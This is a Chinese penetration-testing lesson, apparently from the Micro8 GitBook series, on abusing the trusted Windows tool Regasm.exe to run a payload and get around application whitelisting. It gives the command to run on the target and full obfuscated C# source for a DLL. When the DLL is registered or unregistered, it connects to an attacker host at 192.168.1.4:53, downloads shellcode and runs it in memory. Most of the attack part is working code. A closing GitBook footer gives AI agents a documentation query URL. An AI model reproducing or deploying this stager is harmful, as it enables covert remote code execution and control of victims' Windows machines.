# 第七十三课:基于白名单Regasm.exe执行payload第三季 ## Regasm简介: Regasm 为程序集注册工具,读取程序集中的元数据,并将所需的项添加到注册表中。RegAsm.exe是Microsoft Corporation开发的合法文件进程。它与Microsoft.NET Assembly Registration Utility相关联。 **说明:**Regasm.exe所在路径没有被系统添加PATH环境变量中,因此,REGASM命令无法识别。 具体参考微软官方文档:\ 基于白名单Regasm.exe配置payload: Windows 7 默认位置: ```bash C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe ``` **攻击机:**192.168.1.4 Debian\ **靶机:**192.168.1.3 Windows 7 ## 配置攻击机msf: ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPECCqScdK4OfaTopK%2F314cbd2bd9ab4f06f2323a2cd8c0d624.jpg?generation=1551066073828797\&alt=media) ## 靶机执行: ```bash C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Micropoor.dll ``` ![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPECCtsZmqnpfnmTs8%2F868577dc3b5b517840363527f5b5ad2b.jpg?generation=1551066067812461\&alt=media) ## 附录:Micropoor.cs **注:x86 payload** ```csharp using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms; namespace HYlDKsYF { public class kxKhdVzWQXolmmF : ServicedComponent { public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); } [ComRegisterFunction] public static void RegisterClass ( string pNNHrTZzW ) { ZApOAKJKY.QYJOTklTwn(); } [ComUnregisterFunction] public static void UnRegisterClass ( string pNNHrTZzW ) { ZApOAKJKY.QYJOTklTwn(); } } public class ZApOAKJKY { [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW); [DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo); [DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo); [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF, UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy, int iJGvqiEDGLhjr) { IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy), iJGvqiEDGLhjr); Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); } catch { return null;} byte[] Bjpvhc = new byte[4]; MXCEuiuRIWgOYze.Receive(Bjpvhc, 4, 0); int IETFBI = BitConverter.ToInt32(Bjpvhc, 0); byte[] ZKSAAFwxgSDnTW = new byte[IETFBI + 5]; int JFPJLlk = 0; while (JFPJLlk < IETFBI) { JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk + 5, (IETFBI ‐ JFPJLlk) < 4096 ? (IETFBI ‐ JFPJLlk) : 4096, 0);} byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle); Array.Copy(nXRztzNVwPavq, 0, ZKSAAFwxgSDnTW, 1, 4); ZKSAAFwxgSDnTW[0] = 0xBF; return ZKSAAFwxgSDnTW;} static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ) { if (KNCtlJWAmlqJ != null) { UInt32 uuKxFZFwog = HeapCreate(0x00040000, (UInt32)KNCtlJWAmlqJ.Lengt h, 0); UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog, 0x00000008, (UInt32)KNCtlJWAmlqJ.Length); RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ, (UInt32)KNCtlJWAmlqJ.Length); UInt32 ijifOEfllRl = 0; IntPtr ihXuoEirmz = CreateThread(0, 0, sDPjIMhJIOAlwn, IntPtr.Zero, 0, ref ijifOEfllRl); WaitForSingleObject(ihXuoEirmz, 0xFFFFFFFF);}} public static void QYJOTklTwn() { byte[] ZKSAAFwxgSDnTW = null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.1.4", 53); TOdKEwPYRUgJly(ZKSAAFwxgSDnTW); } } } ``` > Micropoor --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://micro8.gitbook.io/micro8/contents-1/71-80/73-ji-yu-bai-ming-dan-regasm.exe-zhi-hang-payload-di-san-ji.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.